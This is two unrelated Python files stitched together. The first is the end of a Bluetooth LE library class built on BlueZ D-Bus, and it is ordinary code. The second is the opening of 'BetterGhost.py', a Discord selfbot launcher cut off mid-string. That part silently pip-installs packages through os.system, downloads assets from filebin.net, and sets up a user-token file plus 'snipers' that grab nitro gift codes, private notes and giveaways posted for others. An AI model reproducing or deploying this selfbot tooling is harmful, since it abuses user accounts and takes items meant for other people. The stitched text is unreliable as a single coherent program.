Controller,
Device,
BLECharacteristic,
BLEService,
dbus_object_parser)
from bluew.errors import (BluewError,
NoControllerAvailable,
ControllerSpecifiedNotFound,
PairError,
DeviceNotAvailable,
ControllerNotReady,
ReadWriteNotifyError,
InvalidArgumentsError)
from bluew.engine import EngineBluew
from bluew.dbusted.decorators import (mac_to_dev,
check_if_available,
check_if_connected,
check_if_not_paired,
handle_errors)
class DBusted(EngineBluew):
"""
DBusted is an EngineBluew implementation, Using the Bluez D-Bus API.
"""
__instance = None # type: Optional[DBusted]
__loop = None # type: Optional[GLib.MainLoop]
__thread = None # type: Optional[threading.Thread]
__bus = None # type: Optional[dbus.SystemBus]
__count = 0
def __new__(cls, *args, **kwargs):
# pylint: disable=W0612,W0613
DBusted.__count += 1
if DBusted.__instance is None:
DBusted.__instance = object.__new__(cls)
DBusGMainLoop(set_as_default=True)
DBusted.__bus = dbus.SystemBus()
DBusted.__thread = threading.Thread(target=DBusted._start_loop)
DBusted.__thread.start()
return DBusted.__instance
def __init__(self, *args, **kwargs):
name = "DBusted"
version = "0.3.8"
kwargs['name'] = name
kwargs['version'] = version
super().__init__(*args, **kwargs)
self.cntrl = kwargs.get('cntrl', None)
self.timeout = kwargs.get('timeout', 5)
self._bus = DBusted.__bus
self._init_cntrl()
self.logger = logging.getLogger(__name__)
def __enter__(self):
self.start_engine()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop_engine()
@staticmethod
def _start_loop():
DBusted.__loop = GLib.MainLoop()
running = True
while running:
try:
running = False
DBusted.__loop.run()
except KeyboardInterrupt:
running = True
def _init_cntrl(self):
controllers = self.get_controllers()
if self.cntrl is None:
if not controllers:
self.stop_engine()
raise NoControllerAvailable()
cntrl = self._strip_cntrl_path(controllers[0])
self.cntrl = cntrl
else:
paths = list(map(self._strip_cntrl_path, controllers))
if self.cntrl not in paths:
self.stop_engine()
raise ControllerSpecifiedNotFound()
@property
def devices(self):
"""A property to get devices nearby."""
self._start_scan()
boiface = BluezObjectInterface(self._bus)
return boiface.get_devices()
@property
def controllers(self):
"""A property to get controllers available."""
boiface = BluezObjectInterface(self._bus)
return boiface.get_controllers()
@staticmethod
def _strip_cntrl_path(cntrl):
path = getattr(cntrl, 'Path')
return path.replace('/org/bluez/', '')
def start_engine(self) -> None:
"""
Overriding EngineBluew's start_engine method. This method get's called
to init the engine. We register here an agent with bluez during the
initialization. DBusted is a singleton, and so we only need to init
if it's the first instance of DBusted.
:return: None.
"""
if DBusted.__count == 1:
pass
# self._register_agent()
def _register_agent(self):
amiface = BluezAgentManagerInterface(self._bus)
return amiface.register_agent()
def stop_engine(self) -> None:
"""
Overriding EngineBluew's stop_engine method. This method get's called
when the engine is not needed any more. Since DBusted is a singleton
we should only destroy things when all instaces are gone. Otherwise
the engine should keep on running.
:return: None.
"""
DBusted.__count -= 1
if not DBusted.__count:
# self._unregister_agent()
DBusted.__loop.quit()
DBusted.__instance = None
DBusted.__loop = None
DBusted.__thread = None
DBusted.__bus = None
def _unregister_agent(self):
amiface = BluezAgentManagerInterface(self._bus)
return amiface.unregister_agent()
@mac_to_dev
@check_if_available
@handle_errors
def connect(self, mac: str) -> None:
"""
Overriding EngineBluew's connect method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:return: True if succeeded, False otherwise..
"""
deviface = BluezDeviceInterface(self._bus, mac, self.cntrl)
deviface.connect_device()
@mac_to_dev
@check_if_connected
@check_if_available
@handle_errors
def disconnect(self, mac: str) -> None:
"""
Overriding EngineBluew's disconnect method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:return: True if succeeded, False otherwise..
"""
deviface = BluezDeviceInterface(self._bus, mac, self.cntrl)
deviface.disconnect_device()
@mac_to_dev
@check_if_available
@check_if_not_paired
@handle_errors
def pair(self, mac: str) -> None:
"""
Overriding EngineBluew's pair method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:return: True if succeeded, False otherwise..
"""
deviface = BluezDeviceInterface(self._bus, mac, self.cntrl)
deviface.pair_device()
paired = self._is_device_paired_timeout(mac)
if not paired:
raise PairError(self.name, self.version)
@mac_to_dev
@handle_errors
def remove(self, mac: str) -> None:
"""
Overriding EngineBluew's remove method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:return: True if succeeded, False otherwise..
"""
adiface = BluezAdapterInterface(self._bus, self.cntrl)
adiface.remove_device(mac)
def remove_all(self) -> None:
"""Remove all devices."""
devices = self._get_devices()
for dev in devices:
self.remove(getattr(dev, 'Address'))
def get_controllers(self) -> List[Controller]:
"""
Overriding EngineBluew's get_controllers method.
:return: List of controllers available.
"""
boiface = BluezObjectInterface(self._bus)
return boiface.get_controllers()
def get_devices(self) -> List[Device]:
"""
Overriding EngineBluew's get_devices method.
:return: List of devices available.
"""
self.remove_all()
self._start_scan()
get_devices = self._tout(self._get_devices,
self.timeout,
lambda x: False)
devices = get_devices()
self._stop_scan()
return devices
def _get_devices(self) -> List[Device]:
boiface = BluezObjectInterface(self._bus)
devices = boiface.get_devices()
return devices
@mac_to_dev
def get_services(self, mac: str) -> List[BLEService]:
"""
Overriding EngineBluew's get_services method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:return: List of BLE services available.
"""
boiface = BluezObjectInterface(self._bus)
return boiface.get_services(mac)
@mac_to_dev
def get_chrcs(self, mac: str) -> List[BLECharacteristic]:
"""
Overriding EngineBluew's get_chrcs method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:return: List of BLE characteristics available.
"""
boiface = BluezObjectInterface(self._bus)
return boiface.get_characteristics(mac)
@mac_to_dev
@check_if_available
@handle_errors
def info(self, mac):
"""
Overriding EngineBluew's info method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:return: Device object.
"""
devices = self._get_devices()
device = list(filter(lambda x: mac in x.Path, devices))[0]
return device
@mac_to_dev
@check_if_available
@handle_errors
def trust(self, mac: str) -> None:
"""
Overriding EngineBluew's trust method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:return: True if succeeded, False otherwise..
"""
deviface = BluezDeviceInterface(self._bus, mac, self.cntrl)
deviface.trust_device()
@mac_to_dev
@check_if_available
@handle_errors
def distrust(self, mac: str) -> None:
"""
Overriding EngineBluew's untrust method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:return: True if succeeded, False otherwise..
"""
deviface = BluezDeviceInterface(self._bus, mac, self.cntrl)
deviface.distrust_device()
def _start_scan(self) -> None:
adiface = BluezAdapterInterface(self._bus, self.cntrl)
adiface.start_discovery()
def _stop_scan(self) -> None:
adiface = BluezAdapterInterface(self._bus, self.cntrl)
adiface.stop_discovery()
@mac_to_dev
@check_if_available
@handle_errors
def read_attribute(self, mac: str, attribute: str) -> List[bytes]:
"""
Overriding EngineBluew's read_attribute method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:param attribute: UUID of the BLE attribute.
:return: Value of attribute, raise exception otherwise.
"""
path = self._uuid_to_path(attribute, mac)
gattchrciface = BluezGattCharInterface(self._bus, path)
return dbus_object_parser(gattchrciface.read_value())
@mac_to_dev
@check_if_available
@handle_errors
def write_attribute(self, mac: str, attribute: str,
data: List[int]) -> None:
"""
Overriding EngineBluew's write_attribute method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:param attribute: UUID of the BLE attribute.
:param data: The data you want to write.
:return: True if succeeded, False otherwise..
"""
path = self._uuid_to_path(attribute, mac)
gattchrciface = BluezGattCharInterface(self._bus, path)
gattchrciface.write_value(data)
@mac_to_dev
@check_if_available
@handle_errors
def notify(self, mac: str, attribute: str, handler: Callable) -> None:
"""
Overriding EngineBluew's trust method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:param attribute: UUID of the BLE attribute.
:param handler: A callback function with the values returned by the
notifications.
:return: True if succeeded, False otherwise..
"""
path = self._uuid_to_path(attribute, mac)
gattchrciface = BluezGattCharInterface(self._bus, path)
handler = self._handle_notification(handler)
gattchrciface.start_notify(handler)
@mac_to_dev
@check_if_available
@handle_errors
def stop_notify(self, mac: str, attribute: str) -> None:
"""
Overriding EngineBluew's trust method.
:param mac: Device path. @mac_to_dev takes care of getting the proper
path from the device's mac address.
:param attribute: UUID of the BLE attribute.
:return: True if succeeded, False otherwise..
"""
path = self._uuid_to_path(attribute, mac)
gattchrciface = BluezGattCharInterface(self._bus, path)
gattchrciface.stop_notify()
def _handle_errors(self, exp: IfaceError, *args, **kwargs) -> None:
auth_timeout = exp.error_name == IfaceError.BLUEZ_AUTH_TIMEOUT_ERR
auth_failed = exp.error_name == IfaceError.BLUEZ_AUTH_FAILED_ERR
auth_rejected = exp.error_name == IfaceError.BLUEZ_AUTH_REJECTED_ERR
if exp.error_name == IfaceError.BLUEZ_NOT_CONNECTED_ERR:
self.connect(args[0], **kwargs)
elif exp.error_name == IfaceError.NOT_PAIRED:
self.pair(args[0], **kwargs)
elif exp.error_name == IfaceError.BLUEZ_NOT_SUPPORTED_ERR:
self.stop_engine()
not_supported = ReadWriteNotifyError.NOT_SUPPORTED
raise ReadWriteNotifyError(long_reason=not_supported)
elif exp.error_name == IfaceError.BLUEZ_NOT_PERMITTED_ERR:
self.stop_engine()
not_permitted = ReadWriteNotifyError.NOT_PERMITTED
raise ReadWriteNotifyError(long_reason=not_permitted)
elif exp.error_name == IfaceError.BLUEZ_NOT_READY_ERR:
self.stop_engine()
raise ControllerNotReady
elif exp.error_name == IfaceError.BLUEZ_NOT_AUTHORIZED_ERR:
self.stop_engine()
not_authorized = ReadWriteNotifyError.NOT_AUTHORIZED
raise ReadWriteNotifyError(long_reason=not_authorized)
elif exp.error_name == IfaceError.BLUEZ_INVALID_VAL_LEN:
self.stop_engine()
invalid_len = InvalidArgumentsError.INVALID_LEN
raise InvalidArgumentsError(long_reason=invalid_len)
elif exp.error_name == IfaceError.UNKNOWN_ERROR:
raise BluewError(BluewError.UNEXPECTED_ERROR)
elif exp.error_name == IfaceError.BLUEZ_INVALID_ARGUMENTS_ERR:
self.stop_engine()
invalid_args = InvalidArgumentsError.INVALID_ARGS
raise InvalidArgumentsError(long_reason=invalid_args)
elif exp.error_name == IfaceError.BLUEZ_IN_PROGRESS_ERR:
self.stop_engine()
in_progress = ReadWriteNotifyError.IN_PROGRESS
raise ReadWriteNotifyError(long_reason=in_progress)
elif exp.error_name == IfaceError.UNKNOWN_ERROR:
self.stop_engine()
raise BluewError(BluewError.UNEXPECTED_ERROR)
elif auth_failed or auth_timeout or auth_rejected:
self.stop_engine()
raise PairError(long_reason=PairError.AUTHENTICATION_ERROR)
def _is_device_available(self, dev):
self._start_scan()
devices = self._tout(self._get_devices,
self.timeout,
lambda devs: any(dev in d.Path for d in devs))
devices = devices()
filtered = list(filter(lambda device: dev in device.Path, devices))
self._stop_scan()
return bool(filtered)
def _is_device_paired(self, dev):
def _dev_is_paired(devs):
for _dev in devs:
if dev in _dev.Path and _dev.Paired:
return True
return False
devices = self._tout(self._get_devices,
self.timeout,
_dev_is_paired)()
filtered = list(filter(lambda device: dev in device.Path, devices))
filtered = list(filter(lambda device: device.Paired, filtered))
return bool(filtered)
def _is_device_paired_timeout(self, dev):
paired = self._is_device_paired(dev)
return paired
def _is_device_connected(self, dev):
devices = self._tout(self._get_devices,
self.timeout,
lambda devs: any(dev in d.Path for d in devs))
devices = devices()
filtered = list(filter(lambda device: dev in device.Path, devices))
filtered = list(filter(lambda device: device.Connected, filtered))
return bool(filtered)
def _get_attr_path(self, uuid, dev):
chrcs = self.get_chrcs(dev)
try:
chrc = list(filter(lambda chrc_: uuid == chrc_.UUID, chrcs))[0]
path = getattr(chrc, 'Path') # just silencing pycharm.
except IndexError:
path = ''
return path
def _uuid_to_path(self, uuid, dev):
path = self._timeout(self._get_attr_path, self.timeout)(uuid, dev)
if not path:
raise DeviceNotAvailable(self.name, self.version)
return path
@staticmethod
def _handle_notification(func):
def _wrapper(*args):
try:
data = bytes(args[1][dbus.String('Value')])
return func(data)
except KeyError:
pass
return _wrapper
@staticmethod
def _timeout(func, timeout):
def _wrapper(*args, **kwargs):
result = False
start_time = time.time()
current_time = time.time()
while (current_time < start_time + timeout) and not result:
result = func(*args, **kwargs)
current_time = time.time()
return result
return _wrapper
@staticmethod
def _tout(func, timeout, case):
def _wrapper(*args, **kwargs):
is_case = False
timedout = False
ret = None
start_time = time.time()
while not timedout and not is_case:
ret = func(*args, **kwargs)
is_case = case(ret)
timedout = time.time() > start_time + timeout
return ret
return _wrapper
|
BetterGhost.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
# Copyright (C) 2021 Ben Tettmar
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
from re import T
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
printSpaces = " "
if os.name == "nt":
os.system("cls")
# os.system("mode 100,25")
os.system("title BetterGhost")
if os.name == "posix":
os.system("clear")
print(" ")
print(f"{printSpaces}Loading BetterGhost...")
print(" ")
import sys
import subprocess
import logging
if not os.path.exists('logs/'):
os.makedirs('logs/')
print(printSpaces+"Made logs folder.")
open("logs/info.log", "w").write(" ")
print(printSpaces+"Resetting info log.")
open("logs/warning.log", "w").write(" ")
print(printSpaces+"Resetting warning log.")
open("logs/error.log", "w").write(" ")
print(printSpaces+"Resetting error log.")
open("logs/critical.log", "w").write(" ")
print(printSpaces+"Resetting critical log.")
print(" ")
logging.basicConfig(filename="logs/info.log", level=logging.INFO)
logging.basicConfig(filename="logs/warning.log", level=logging.WARNING)
logging.basicConfig(filename="logs/error.log", level=logging.ERROR)
logging.basicConfig(filename="logs/critical.log", level=logging.CRITICAL)
try:
# pythonVersion = float(str(sys.version_info[0])+"."+str(sys.version_info[1]))
# if pythonVersion < 3.8:
# input("You're not using a supported Python version.")
# exit()
# else:
# print("You're using a supported python version, " + str(pythonVersion))
def install(package):
os.system(f"{sys.executable} -m pip install {package}")
def uninstall(package):
os.system(f"{sys.executable} -m pip uninstall {package}")
if "discord.py" in sys.modules:
uninstall("discord.py")
if "discordselfbot" in sys.modules:
uninstall("discordselfbot")
try:
import discord
except ModuleNotFoundError:
install("discord.py-self")
#try:
# import pyPrivnote as pn
#except ModuleNotFoundError:
# install("pyPrivnote")
try:
import names
except ModuleNotFoundError:
install("names")
try:
import simplejson
except ModuleNotFoundError:
install("simplejson")
try:
import aiohttp
except ModuleNotFoundError:
install("aiohttp")
try:
from colour import Color
except ModuleNotFoundError:
install("colour")
try:
from termcolor import colored
except ModuleNotFoundError:
install("termcolor")
try:
from faker import Faker
except ModuleNotFoundError:
install("Faker")
if os.name == "nt":
try:
import plyer
except ModuleNotFoundError:
install("plyer")
try:
from sty import fg, bg, ef, rs, Style, RgbFg
except ModuleNotFoundError:
install("sty==1.0.0rc0")
try:
import colorama
except ModuleNotFoundError:
install("colorama")
try:
import discord_rpc
except ModuleNotFoundError:
install("discord-rpc.py")
try:
import requests
except ModuleNotFoundError:
install("requests")
try:
import uwuify
except ModuleNotFoundError:
install("uwuify")
try:
import numpy as np
except ModuleNotFoundError:
install("numpy")
try:
import discum
except ModuleNotFoundError:
install("discum")
try:
from discord_webhook import DiscordWebhook, DiscordEmbed
except ModuleNotFoundError:
install("discord-webhook")
try:
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem
except ModuleNotFoundError:
install("random_user_agent")
try:
import GPUtil
except ModuleNotFoundError:
install("gputil")
try:
import psutil
except ModuleNotFoundError:
install("psutil")
try:
import PIL
except ModuleNotFoundError:
install("pillow")
try:
import pygame
except ModuleNotFoundError:
install("pygame")
# if os.name == "posix":
# if str(subprocess.check_output(["apt-cache", "policy", "libportaudio2"])).split("\\n")[1][2:].split(": ")[1] == "(none)":
# os.system("sudo apt-get install libportaudio2")
try:
import sounddevice
except ModuleNotFoundError:
install("sounddevice")
try:
import discord_emoji
except ModuleNotFoundError:
install("discord-emoji")
if sys.platform == "darwin":
try:
import pync
except ModuleNotFoundError:
install("pync")
if os.name == "nt":
try:
import wmi
except ModuleNotFoundError:
install("WMI")
import wmi
if os.name == "nt":
import plyer
try:
import tkinter
except:
pass
if sys.platform == "darwin":
import pync
import colorama
import discord_emoji
import threading
import pygame
import PIL
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem
from discord_webhook import DiscordWebhook, DiscordEmbed
import discum
if os.name == "nt":
import winshell
import uwuify
import getpass
import mimetypes
import discord_rpc
from sty import fg, bg, ef, rs, Style, RgbFg
import discord
import json
#import pyPrivnote as pn
import random
import asyncio
import requests
import aiohttp
import names
import string
import simplejson
import base64
import math
import time
import urllib
import urllib.request
import codecs
import platform
import psutil
import re
import ctypes
import ctypes.util
import GPUtil
from urllib.request import Request, urlopen
from colour import Color
from discord.ext import commands
from discord.utils import get
from termcolor import colored, cprint
from os.path import dirname, basename, isfile, join
from datetime import datetime, timedelta
import numpy as np
from faker import Faker
def update_config():
configJson = json.load(open("config.json"))
configFile = open("config.json", "r").read()
if ("riskmode" not in configFile):
print(f"{printSpaces}Adding risk mode to config.")
configJson["riskmode"] = bool(False)
if ("load_on_startup" not in configFile):
print(f"{printSpaces}Adding load on startup to config.")
configJson["load_on_startup"] = bool(False)
if ("giveaway_join_delay" not in configFile):
print(f"{printSpaces}Adding giveaway join delay to config.")
configJson["giveaway_join_delay"] = 15
if ("giveaway_sniper_ui" not in configFile):
print(printSpaces+"Adding giveaway sniper ui to config.")
configJson["giveaway_sniper_ui"] = False
if ("snipers" not in configFile):
configJson["snipers"] = {}
print(printSpaces+"Adding nitro sniper to config.")
configJson["snipers"]["nitro"] = bool(True)
print(printSpaces+"Adding privnote sniper to config.")
configJson["snipers"]["privnote"] = bool(True)
print(printSpaces+"Adding giveaway sniper to config.")
configJson["snipers"]["giveaway"] = bool(True)
if ("webhooks" not in configFile):
configJson["webhooks"] = {}
print(printSpaces+"Adding nitro webhook to config.")
configJson["webhooks"]["nitro"] = ""
print(printSpaces+"Adding privnote webhook to config.")
configJson["webhooks"]["privnote"] = ""
print(printSpaces+"Adding giveaway webhook to config.")
configJson["webhooks"]["giveaway"] = ""
if ("motd" not in configFile):
configJson["motd"] = {}
configJson["motd"]["custom"] = bool(False)
print(printSpaces+"Adding custom motd option to config.")
configJson["motd"]["custom_text"] = "Super Cool Custom MOTD"
print(printSpaces+"Adding custom motd text to config.")
if ("selfbot_detect" in configFile):
configJson.pop("selfbot_detect")
print(printSpaces+"Removing selfbot detect from config.")
if ("ghostping_detect" in configFile):
configJson.pop("ghostping_detect")
print(printSpaces+"Removing ghostping detect from config.")
if ("ghostping" not in configJson["webhooks"]):
configJson["webhooks"]["ghostping"] = ""
print(printSpaces+"Adding ghostping webhook to config.")
if ("friendsupdate" not in configJson["webhooks"]):
configJson["webhooks"]["friendsupdate"] = ""
print(printSpaces+"Adding friends update webhook to config.")
if ("dmtyping" not in configJson["webhooks"]):
configJson["webhooks"]["dmtyping"] = ""
print(printSpaces+"Adding DM typing webhook to config.")
if ("guildleave" not in configJson["webhooks"]):
configJson["webhooks"]["guildleave"] = ""
print(printSpaces+"Adding guild leave webhook to config.")
if ("selfbot" not in configJson["webhooks"]):
configJson["webhooks"]["selfbot"] = ""
print(printSpaces+"Adding selfbot webhook to config.")
if ("tickets" not in configJson["webhooks"]):
configJson["webhooks"]["tickets"] = ""
print(printSpaces+"Adding tickets webhook to config.")
if ("sounds" not in configFile):
configJson["sounds"] = bool(True)
print(printSpaces+"Adding sounds toggle to config.")
if ("detections" not in configFile):
configJson["detections"] = {}
configJson["detections"]["selfbot"] = bool(True)
print(printSpaces+"Adding selfbot detection to config.")
configJson["detections"]["ghostping"] = bool(True)
print(printSpaces+"Adding ghostping detection to config.")
configJson["detections"]["bans"] = bool(True)
print(printSpaces+"Adding ban detection to config.")
if ("deletedmessages" not in configJson["detections"]):
configJson["detections"]["deletedmessages"] = bool(False)
print(printSpaces+"Adding deleted messages detection to config.")
if ("webhookmodification" not in configJson["detections"]):
configJson["detections"]["webhookmodification"] = bool(True)
print(printSpaces+"Adding webhook modification detection to config.")
if ("friendsupdate" not in configJson["detections"]):
configJson["detections"]["friendsupdate"] = bool(True)
print(printSpaces+"Adding friends update detection to config.")
if ("dmtyping" not in configJson["detections"]):
configJson["detections"]["dmtyping"] = bool(True)
print(printSpaces+"Adding DM typing detection to config.")
if ("guildleave" not in configJson["detections"]):
configJson["detections"]["guildleave"] = bool(True)
print(printSpaces+"Adding guild leave detection to config.")
if ("embed_mode" not in configFile):
configJson["embed_mode"] = bool(False)
print(printSpaces+"Adding embed mode to config.")
if ("ignored_servers" not in configFile):
configJson["ignored_servers"] = {}
configJson["ignored_servers"]["nitro"] = []
print(printSpaces+"Adding nitro ignored servers to config.")
configJson["ignored_servers"]["privnote"] = []
print(printSpaces+"Adding privnote ignored servers to config.")
configJson["ignored_servers"]["giveaways"] = []
print(printSpaces+"Adding giveaways ignored servers to config.")
configJson["ignored_servers"]["ghostpings"] = []
print(printSpaces+"Adding ghostpings ignored servers to config.")
configJson["ignored_servers"]["selfbots"] = []
print(printSpaces+"Adding selfbots ignored servers to config.")
configJson["ignored_servers"]["bans"] = []
print(printSpaces+"Adding bans ignored servers to config.")
configJson["ignored_servers"]["deletedmessages"] = []
print(printSpaces+"Adding deletedmessages ignored servers to config.")
if ("webhookmodifications" not in configJson["ignored_servers"]):
configJson["ignored_servers"]["webhookmodifications"] = []
print(printSpaces+"Adding webhook modification ignored servers to config.")
if ("tickets" not in configJson["snipers"]):
configJson["snipers"]["tickets"] = bool(True)
print(printSpaces+"Adding ticket sniper to config.")
if ("tickets" not in configJson["ignored_servers"]):
configJson["ignored_servers"]["tickets"] = []
print(printSpaces+"Adding tickets ignored servers to config.")
if ("guildleave" not in configJson["ignored_servers"]):
configJson["ignored_servers"]["guildleave"] = []
print(printSpaces+"Adding guild leave ignored servers to config.")
if ("api_keys" not in configFile):
print(printSpaces+"Adding api keys to config.")
configJson["api_keys"] = {}
configJson["api_keys"]["tenor"] = ""
if ("alexflipnote" not in configJson["api_keys"]):
print(printSpaces+"Adding alexflipnote to api keys.")
configJson["api_keys"]["alexflipnote"] = ""
if ("afkmode" not in configFile):
print(printSpaces+"Adding afkmode to config.")
configJson["afkmode"] = {}
configJson["afkmode"]["enabled"] = False
configJson["afkmode"]["replymessage"] = "[AUTOMATED] i'm currently afk i will respond as soon as possible"
if ("toastnotifications" not in configFile):
print(printSpaces+"Adding toast notifications to config.")
configJson["toastnotifications"] = True
json.dump(configJson, open("config.json", "w"), sort_keys=False, indent=4)
configJson = json.load(open("config.json"))
configFile = open("config.json", "r").read()
if ("load_on_startup" in configFile):
configJson.pop("load_on_startup")
print(printSpaces+"Removing load on startup from config.")
json.dump(configJson, open("config.json", "w"), sort_keys=False, indent=4)
if not os.path.exists('pytoexe/'): os.makedirs('pytoexe/');
if not os.path.exists('privnote-saves/'): os.makedirs('privnote-saves/');
if not os.path.exists('scripts/'): os.makedirs('scripts/');
if not os.path.exists('data/'): os.makedirs('data/');
if not os.path.exists('themes/'): os.makedirs('themes/');
if not os.path.exists('sounds/'): os.makedirs('sounds/');
if not os.path.isfile('icon.ico'): open('icon.ico', 'wb').write(requests.get('https://raw.githubusercontent.com/tenieTheFlower/icon/main/icon.ico', allow_redirects=True).content);
if not os.path.isfile('sounds/connected.mp3'): open('sounds/connected.mp3', 'wb').write(requests.get('https://filebin.net/x1ug44p9jgk0na3r/connected.mp3', allow_redirects=True).content);
if not os.path.isfile('sounds/error.mp3'): open('sounds/error.mp3', 'wb').write(requests.get('https://filebin.net/x1ug44p9jgk0na3r/error.mp3', allow_redirects=True).content);
if not os.path.isfile('sounds/notification.mp3'): open('sounds/notification.mp3', 'wb').write(requests.get('https://filebin.net/x1ug44p9jgk0na3r/notification.mp3', allow_redirects=True).content);
if not os.path.isfile('sounds/success.mp3'): open('sounds/success.mp3', 'wb').write(requests.get('https://filebin.net/x1ug44p9jgk0na3r/success.mp3', allow_redirects=True).content);
if not os.path.isfile('sounds/giveaway-win.mp3'): open('sounds/giveaway-win.mp3', 'wb').write(requests.get('https://filebin.net/x1ug44p9jgk0na3r/giveaway-win.mp3', allow_redirects=True).content);
# if not os.path.isfile('icon.ico'): open('icon.ico', 'wb').write(requests.get('https://ghost.cool/favicon.ico', allow_redirects=True).content);
# if not os.path.isfile('sounds/connected.mp3'): open('sounds/connected.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/connected.mp3', allow_redirects=True).content);
# if not os.path.isfile('sounds/error.mp3'): open('sounds/error.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/error.mp3', allow_redirects=True).content);
# if not os.path.isfile('sounds/notification.mp3'): open('sounds/notification.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/notification.mp3', allow_redirects=True).content);
# if not os.path.isfile('sounds/success.mp3'): open('sounds/success.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/success.mp3', allow_redirects=True).content);
# if not os.path.isfile('sounds/giveaway-win.mp3'): open('sounds/giveaway-win.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/giveaway-win.mp3', allow_redirects=True).content);
# if not os.path.exists('trump-tweets/'): os.makedirs('trump-tweets/');
# if not os.path.exists('trump-tweets/assets'): os.makedirs('trump-tweets/assets');
# if not os.path.isfile('trump-tweets/assets/bg.png'):
# dtrumpbg = 'https://bennyware.xyz/files/dtrumptweetbg.png'
# dtrumpbg_r = requests.get(dtrumpbg, allow_redirects=True)
# open('trump-tweets/assets/bg.png', 'wb').write(dtrumpbg_r.content)
# if not os.path.isfile('trump-tweets/assets/roboto.ttf'):
# font = 'https://bennyware.xyz/files/roboto.ttf'
# font_r = requests.get(font, allow_redirects=True)
# open('trump-tweets/assets/roboto.ttf', 'wb').write(font_r.content)
# open('data/icon.png', 'wb').write(requests.get('http://ghost.cool/assets/icon.png', allow_redirects=True).content)
if not os.path.isfile('config.json'):
f = open('config.json', "w")
f.write("""
{
"token": "",
"prefix": ".",
"delete_timeout": 15,
"theme": "BetterGhost"
}
""")
f.close()
if not os.path.isfile('giveawaybots.json'):
f = codecs.open('giveawaybots.json', "w", encoding="UTF-8")
f.write("""
{
"294882584201003009": "🎉",
"396464677032427530": "🎉",
"720351927581278219": "🎉",
"582537632991543307": "🎉"
}
""")
f.close()
if not os.path.isfile('customcommands.json'):
f = open('customcommands.json', "w")
f.write("""
{
"cmd1": "this is cmd1",
"cmd2": "this is cmd2"
}
""")
f.close()
if not os.path.isfile('richpresence.json'):
f = open('richpresence.json', 'w')
f.write("""
{
"enabled": true,
"client_id": 914646995728220231,
"details": "Using BetterGhost selfbot...",
"state": "BetterGhost User",
"large_image_key": "icon",
"large_image_text": "http://www.betterghost.cf/"
}
""")
f.close()
if os.path.isfile("richpresence.json"):
jsonFile = json.load(open("richpresence.json"))
if jsonFile["client_id"] == 914646995728220231:
jsonFile["client_id"] = 914646995728220231
if jsonFile["details"] == "Using BetterGhost selfbot...":
jsonFile["details"] = "Using BetterGhost..."
if "small_image_key" not in jsonFile:
jsonFile["small_image_key"] = "small"
if "small_image_text" not in jsonFile:
jsonFile["small_image_text"] = "http://www.betterghost.cf/"
json.dump(jsonFile, open("richpresence.json", "w"), sort_keys=False, indent=4)
if not os.path.isfile('themes/BetterGhost.json'):
f = open('themes/BetterGhost.json', "w")
f.write("""
{
"embedtitle": "BetterGhost",
"embedcolour": "#3B79FF",
"consolecolour": "#3B79FF",
"embedfooter": "http://www.betterghost.cf/",
"embedfooterimage": "https://ghost.cool/assets/icon.gif",
"globalemoji": ":blue_heart:",
"embedimage": "https://ghost.cool/assets/icon.gif"
}
""")
f.close()
if not os.path.isfile('data/personal-pins.json'):
f = open('data/personal-pins.json', "w")
f.write("{}")
f.close()
if not os.path.isfile('data/tokens.txt'):
f = open('data/tokens.txt', "w")
f.close()
if not os.path.isfile('data/rickroll.txt'):
f = open('data/rickroll.txt', "w")
f.write("""We're no strangers to love
You know the rules and so do I
A full commitment's what I'm thinking of
You wouldn't get this from any other guy
I just wanna tell you how I'm feeling
Gotta make you understand
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
We've known each other for so long
Your heart's been aching but you're too shy to say it
Inside we both know what's been going on
We know the game and we're gonna play it
And if you ask me how I'm feeling
Don't tell me you're too blind to see
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
